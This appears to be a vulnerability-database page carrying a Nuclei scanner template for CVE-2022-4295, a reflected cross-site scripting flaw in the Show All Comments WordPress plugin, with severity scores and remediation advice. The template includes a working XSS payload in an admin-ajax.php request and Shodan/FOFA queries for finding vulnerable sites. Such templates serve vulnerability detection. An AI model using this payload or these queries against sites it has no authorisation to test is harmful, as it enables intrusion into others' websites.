Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-4295
HistoryJul 07, 2023 - 9:38 a.m.

Show all comments < 7.0.1 - Cross-Site Scripting

2023-07-0709:38:49
ProjectDiscovery
github.com
1
wordpress
plugin
show-all-comments
xss
vulnerability
wp
appjetty

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.2%

The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.
id: CVE-2022-4295

info:
  name: Show all comments < 7.0.1 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4295
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-4295
    cwe-id: CWE-79
    epss-score: 0.0012
    epss-percentile: 0.46205
    cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: appjetty
    product: show_all_comments
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/show-all-comments-in-one-page
    fofa-query: body=/wp-content/plugins/show-all-comments-in-one-page
    publicwww-query: /wp-content/plugins/show-all-comments-in-one-page
  tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<script>alert(document.domain)</script>")'
          - 'contains(body, "Select </option>")'
        condition: and
# digest: 4a0a004730450221009568b6b04ed59190b506644ec8bde2998eff1dad1caef281547bbdd42ff5c6c2022076f6ce5bab29374968eab7b603c3ea666a5c1bfc44f90caa60a5c36fff75cb77:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.2%

Related for NUCLEI:CVE-2022-4295